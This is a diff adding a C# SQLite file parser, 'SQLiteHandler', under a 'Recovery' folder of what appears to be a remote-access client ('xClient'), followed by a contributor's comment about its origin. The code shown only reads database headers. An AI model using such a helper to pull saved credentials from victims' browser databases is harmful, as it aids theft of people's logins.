Client/Core/Recovery/Helper/SQLiteHandler.cs

```diff
@@ -0,0 +1,473 @@
+﻿using System;
+using System.Runtime.InteropServices;
+using System.IO;
+using System.Text;
+using Microsoft.VisualBasic.CompilerServices;
+using Microsoft.VisualBasic;
+
+namespace xClient.Core.Recovery.Helper
+{
+    public class SQLiteHandler
+    {
+        private byte[] db_bytes;
+        private ulong encoding;
+        private string[] field_names;
+        private sqlite_master_entry[] master_table_entries;
+        private ushort page_size;
+        private byte[] SQLDataTypeSize = new byte[] { 0, 1, 2, 3, 4, 6, 8, 8, 0, 0 };
+        private table_entry[] table_entries;
+
+        public SQLiteHandler(string baseName)
+        {
+            if (File.Exists(baseName))
+            {
+                FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
+                string str = Strings.Space((int)FileSystem.LOF(1));
+                FileSystem.FileGet(1, ref str, -1L, false);
+                FileSystem.FileClose(new int[] { 1 });
+                this.db_bytes = Encoding.Default.GetBytes(str);
+                if (Encoding.Default.GetString(this.db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
+                {
+                    throw new Exception("Not a valid SQLite 3 Database File");
+                }
+                if (this.db_bytes[0x34] != 0)
+                {
+                    throw new Exception("Auto-vacuum capable database is not supported");
+                }
+                //if (decimal.Compare(new decimal(this.ConvertToInteger(0x2c, 4)), 4M) >= 0)
+                //{
+                //    throw new Exception("No supported Schema layer file-format");
+                //}
+                this.page_size = (ushort)this.ConvertToInteger(0x10, 2);
+                this.encoding = this.ConvertToInteger(0x38, 4);
+                if (decimal.Compare(new decimal(this.encoding), decimal.Zero) == 0)
+                {
+                    this.encoding = 1L;
+                }
+                this.ReadMasterTable(100L);
+            }
+        }
+
+        private ulong ConvertToInteger(int startIndex, int Size)
+        {
+            if ((Size > 8) | (Size == 0))
+            {
+                return 0L;
+            }
+            ulong num2 = 0L;
+            int num4 = Size - 1;
+            for (int i = 0; i <= num4; i++)
+            {
+                num2 = (num2 << 8) | this.db_bytes[startIndex + i];
+            }
+            return num2;
+        }
+
+        private long CVL(int startIndex, int endIndex)
```

Comment:
//
    //             Coded By: RockingWithTheBest
    //
    //             v 0.1
    //
    //
    //      A Handler for SQLite without needing the sqlite3.dll!
    //      You can read every table and value from database, but
    //      there is no support for input. Also no support for
    //      journal files and overflow pages, maybe i will add
    //      that in a later release.
    //      
    //
    //             Have Fun!
    //
    //   If u want to learn more about or enhance it then visit:
    //      http://www.sqlite.org/fileformat.html
    //
    //   If you copy or modify it, please add me to credits!
    //
    //   Questions etc. to:      peterrlustig@googlemail.com
    //   Converted by Unknown and added to as needed by LaPanthere

Does that help? I have no idea what it is for. (CVL I assume?)
It was either a class, or a dll, or pinvoke, I know maxxor doesn't like third party dlls/libs, so I settled for this.